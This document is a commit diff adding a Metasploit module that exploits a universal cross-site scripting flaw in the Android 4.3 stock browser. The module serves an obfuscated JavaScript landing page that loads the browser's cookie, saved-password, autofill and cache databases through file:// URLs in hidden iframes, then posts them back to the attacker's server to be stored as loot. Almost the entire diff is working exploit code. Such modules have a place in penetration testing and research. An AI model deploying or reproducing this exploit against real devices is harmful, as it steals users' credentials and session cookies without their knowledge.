Add android 4.3 stock browser cookie/password theft.

2015-02-25 21:02:15 -06:00 · 2015-02-25 21:02:15 -06:00 · a410d2ec25
parent 141e2e732f
commit a410d2ec25
1 changed files with 137 additions and 0 deletions
--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/jsobfu'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::JSObfu
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Android Browser File Theft',
+      'Description' => %q{
+        This module steals the cookie, password, and autofill databases from the
+        Browser application on AOSP 4.3 and below.
+      },
+      'Author'         => [
+        'Rafay Baloch', # Found UXSS bug in Android Browser
+        'joev'          # File redirect and msf module
+      ],
+      'License'     => MSF_LICENSE,
+      'Actions'     => [[ 'WebServer' ]],
+      'PassiveActions' => [ 'WebServer' ],
+      'References' =>
+        [
+          ['URL', 'https://code.google.com/p/chromium/issues/detail?id=90222'] # the UXSS
+        ],
+      'DefaultAction'  => 'WebServer'
+    ))
+
+     register_options([
+      OptString.new('ADDITIONAL_FILES', [
+        false,
+        'Comma-separated list of addition file URLs to steal.',
+      ]),
+      OptBool.new('DEFAULT_FILES', [
+        true,
+        'Steals a default set of file URLs',
+        true
+      ])
+    ], self.class)
+  end
+
+  def run
+    exploit
+  end
+
+  def on_request_uri(cli, request)
+    if request.method.downcase == 'post'
+      process_post(cli, request)
+      send_response_html(cli, '')
+    else
+      print_status("Sending exploit landing page...")
+      send_response_html(cli, exploit_html)
+    end
+  end
+
+  def process_post(cli, request)
+    data = JSON.parse(request.body)
+    file = File.basename(data['url'])
+    print_good "File received: #{request.body.length.to_f/1024}kb #{file}"
+    loot_path = store_loot(
+      file,
+      'application/x-sqlite3',
+      cli.peerhost,
+      data,
+      File.basename(data['url']),
+      "#{cli.peerhost.ljust(16)} Android browser file"
+    )
+    print_good "Saved to: #{loot_path}"
+  end
+
+
+  def file_urls
+    default_urls = [
+      'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db',
+      'file:///data/data/com.android.browser/databases/webview.db',
+      'file:///data/data/com.android.browser/databases/autofill.db',
+      'file:///data/data/com.android.browser/databases/browser2.db',
+      'file:///data/data/com.android.browser/app_appcache/ApplicationCache.db',
+      'file:///data/data/com.android.browser/app_databases/Databases.db',
+      'file:///data/data/com.android.browser/databases/webviewCookiesChromiumPrivate.db'
+    ]
+
+    unless datastore['DEFAULT_FILES']
+      default_urls = []
+    end
+
+    default_urls + (datastore['ADDITIONAL_FILES']||'').split(',')
+  end
+
+  def exploit_html
+    %Q|
+      <!doctype html>
+      <html>
+      <body>
+      <script>#{exploit_js}</script>
+      </body>
+      </html>
+    |
+  end
+
+  def exploit_js
+    js_obfuscate %Q|
+
+      window.onmessage = function(e) {
+        var x = new XMLHttpRequest;
+        x.open("POST", location.href);
+        x.send(JSON.stringify(e.data))
+      };
+
+      var brokenFrame = document.createElement('iframe');
+      brokenFrame.src = 'http://localhost:100';
+      brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
+      brokenFrame.onload = function() {
+        brokenFrame.onload = null;
+        document.documentURI = 'javascript://hostname.com/%0D%0Aurls=(#{JSON.generate(file_urls)});'+
+          'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+
+          'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
+          'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+
+          'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+
+          'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+
+          'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+
+          'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();';
+        brokenFrame.contentWindow.location = "";
+      };
+
+      document.body.appendChild(brokenFrame);
+    |
+  end
+
+end